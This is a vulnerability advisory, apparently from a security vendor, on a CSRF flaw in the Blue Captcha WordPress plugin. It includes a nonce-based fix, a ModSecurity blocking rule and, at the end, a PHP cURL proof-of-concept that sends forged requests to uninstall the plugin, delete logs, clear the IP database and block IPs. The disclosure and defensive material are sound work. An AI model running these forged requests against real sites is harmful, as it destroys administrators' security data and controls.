Atomic Edge analysis of CVE-2026-10552 (metadata-based): Blue Captcha <= 2.0.1 for WordPress contains multiple Cross-Site Request Forgery (CSRF) vulnerabilities affecting its admin panel. These allow unauthenticated attackers to uninstall the plugin, delete logs, remove Hall of Shame entries, and block arbitrary IPs by tricking an admin into clicking a malicious link. The CVSS score is 4.3 (medium severity) due to the need for user interaction and limited integrity impact.
The root cause, confirmed by Atomic Edge analysis of the vulnerability description, is a complete absence of nonce validation across all administrative actions. The plugin uses a generic 'blcap_action' parameter in $_REQUEST to route operations including plugin_uninstall(), delete_logs(), delete_ip_db(), and update_option('blcap_settings') for IP blocking. No wp_verify_nonce(), check_admin_referer(), or check_ajax_referer() calls exist anywhere in the codebase. This is inferred from the description's explicit statement and the CWE-352 classification.
Exploitation requires an attacker to craft a malicious link or form that sends a request to /wp-admin/admin.php?page=blcap_main_page (or subpages like blcap_hall_of_shame, blcap_log) with the blcap_action parameter set to one of the destructive values. For example, to uninstall the plugin, the attacker would link to /wp-admin/admin.php?page=blcap_main_page&blcap_action=blcap_uninstall. To add an IP to the block list, they would include update_option parameters. The attacker must trick a logged-in administrator into clicking this link (e.g., via email or a phishing page), as the request will be processed with the admin's session cookies.
Remediation requires the developer to add CSRF nonce verification for every administrative action. Each handler should call check_admin_referer() with a unique action name before performing any destructive operation. WordPress provides wp_nonce_url() for URLs and wp_nonce_field() for forms, along with check_admin_referer() for validation. Absent a patch, site administrators should remove the plugin or restrict admin access to trusted users only.
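The hardening described above, as an added example that is not the plugin's own code: a version of the generic blcap_action dispatcher that binds every administrative action to its own nonce, checks the caller's capability first, and only then runs the handler. The handler names (blcap_do_uninstall, blcap_do_delete_logs, blcap_do_delete_ip_db, blcap_sanitize_settings) and the admin_init hook are assumptions for illustration; the action values are the ones named in the advisory.

```php
<?php
// Added example, not Blue Captcha's code. Handler names marked "hypothetical"
// are placeholders for the plugin's real functions.

// One nonce action name per routed operation: a token minted for one action
// is never valid for another.
function blcap_nonce_action_for( $action ) {
    $map = array(
        'blcap_uninstall'    => 'blcap_uninstall_plugin',
        'blcap_delete_logs'  => 'blcap_delete_logs',
        'blcap_delete_ip_db' => 'blcap_delete_ip_db',
        'update_option'      => 'blcap_update_settings',
    );
    return isset( $map[ $action ] ) ? $map[ $action ] : false;
}

// Admin links must be generated with wp_nonce_url(), which appends the
// _wpnonce query argument that check_admin_referer() later validates.
function blcap_action_url( $page, $action ) {
    $url = add_query_arg(
        array( 'page' => $page, 'blcap_action' => $action ),
        admin_url( 'admin.php' )
    );
    return wp_nonce_url( $url, blcap_nonce_action_for( $action ) );
}

// Settings form: wp_nonce_field() emits the hidden _wpnonce input that
// check_admin_referer( 'blcap_update_settings' ) checks on submit.
function blcap_render_settings_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=blcap_main_page' ) ) . '">';
    wp_nonce_field( 'blcap_update_settings' );
    echo '<input type="hidden" name="blcap_action" value="update_option">';
    echo '<input type="text" name="blcap_settings[blocked_ips][]" value="">';
    submit_button( 'Save settings' );
    echo '</form>';
}

// Dispatcher: capability check, then nonce check, then the handler.
function blcap_handle_admin_action() {
    if ( ! isset( $_REQUEST['blcap_action'] ) ) {
        return;
    }
    $action       = sanitize_key( wp_unslash( $_REQUEST['blcap_action'] ) );
    $nonce_action = blcap_nonce_action_for( $action );
    if ( false === $nonce_action ) {
        wp_die( 'Unknown action.' );
    }

    // Non-administrators are rejected before any state is touched.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // check_admin_referer() verifies the _wpnonce value against the named
    // action and the current user's session, and dies with the standard
    // "link has expired" page if it is missing, wrong or too old. A request
    // forged from another origin cannot carry such a token.
    check_admin_referer( $nonce_action );

    switch ( $action ) {
        case 'blcap_uninstall':
            blcap_do_uninstall();      // hypothetical handler
            break;
        case 'blcap_delete_logs':
            blcap_do_delete_logs();    // hypothetical handler
            break;
        case 'blcap_delete_ip_db':
            blcap_do_delete_ip_db();   // hypothetical handler
            break;
        case 'update_option':
            $raw      = isset( $_POST['blcap_settings'] ) && is_array( $_POST['blcap_settings'] )
                ? wp_unslash( $_POST['blcap_settings'] )
                : array();
            $settings = blcap_sanitize_settings( $raw ); // hypothetical sanitizer
            update_option( 'blcap_settings', $settings );
            break;
    }
}
add_action( 'admin_init', 'blcap_handle_admin_action' );
```

The capability check is deliberately separate from the nonce check: a nonce proves the request came from a page WordPress rendered for this user, not that the user is allowed to perform the action, so both are needed. Settings changes are read only from $_POST so that a GET link cannot alter the blocked-IP list.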
The impact includes complete plugin uninstallation (losing captcha functionality), deletion of security audit logs, clearing the Hall of Shame which tracks suspicious IPs, and adding attacker-controlled IPs to the block list (potentially causing denial of service for legitimate users or hiding attacker IPs from future scanning). Since this is a CSRF, it does not allow data theft or privilege escalation directly, but the integrity modifications can degrade site security and availability.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE. It is a three-part chain: the request must target /wp-admin/admin.php, the page parameter must start with blcap_, and the blcap_action parameter must contain one of the destructive values. Because @pm matches substrings, prefixed values such as blcap_delete_logs and blcap_delete_ip_db are caught as well. Note that the rule cannot distinguish a forged request from a legitimate administrator performing the same action, so those actions will be blocked until the plugin is patched.
# Atomic Edge WAF Rule - CVE-2026-10552 (metadata-based)
# This rule blocks CSRF exploitation attempts against Blue Captcha admin endpoints
# by matching requests to known vulnerable pages with destructive blcap_action values.
SecRule REQUEST_URI "@rx /wp-admin/admin\.php" \
    "id:20261055,phase:2,deny,status:403,msg:'CVE-2026-10552 - Blue Captcha CSRF via blcap_action parameter',severity:'CRITICAL',tag:'CVE-2026-10552',chain"
    SecRule ARGS_GET:page "@rx ^blcap_" "chain"
        SecRule ARGS:blcap_action "@pm blcap_uninstall delete_logs delete_ip_db update_option" "t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-10552 - Blue Captcha <= 2.0.1 - CSRF via blcap_action Parameter
// This script demonstrates four destructive CSRF attacks against Blue Captcha.
// It uses cURL to send forged requests. The attacker must trick a logged-in admin
// into triggering these requests (e.g., via an HTML form auto-submit or a direct link).
$target_url = 'http://example.com'; // Change to the target WordPress site URL

// Attack 1: Uninstall the plugin
$uninstall_url = $target_url . '/wp-admin/admin.php?page=blcap_main_page&blcap_action=blcap_uninstall';
echo "[+] Attempting plugin uninstall via: $uninstall_url\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $uninstall_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_hash=test; wordpress_sec_hash=test'); // attacker must provide a valid admin session
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code == 200) {
    echo "[+] Uninstall request sent. Check plugin status.\n";
} else {
    echo "[!] Uninstall request returned HTTP $http_code\n";
}
curl_close($ch);

// Attack 2: Delete audit logs
$log_url = $target_url . '/wp-admin/admin.php?page=blcap_log&blcap_action=blcap_delete_logs';
echo "[+] Attempting log deletion via: $log_url\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $log_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_hash=test; wordpress_sec_hash=test');
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[+] Log deletion request sent (HTTP $http_code).\n";
curl_close($ch);

// Attack 3: Delete Hall of Shame (IP blocklist)
$hos_url = $target_url . '/wp-admin/admin.php?page=blcap_hall_of_shame&blcap_action=blcap_delete_ip_db';
echo "[+] Attempting Hall of Shame deletion via: $hos_url\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $hos_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_hash=test; wordpress_sec_hash=test');
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[+] Hall of Shame deletion request sent (HTTP $http_code).\n";
curl_close($ch);

// Attack 4: Add arbitrary IP to block list (via POST to update_option)
$block_ip_url = $target_url . '/wp-admin/admin.php?page=blcap_main_page';
$ip_to_block = '192.168.1.100'; // IP address the attacker wants to block
$payload = array(
    'blcap_action'  => 'update_option',
    'blcap_settings' => array(
        'blocked_ips' => array(
            $ip_to_block
        )
    )
);
echo "[+] Attempting to block IP $ip_to_block via POST to: $block_ip_url\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $block_ip_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_hash=test; wordpress_sec_hash=test');
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[+] IP blocking request sent (HTTP $http_code).\n";
curl_close($ch);
?>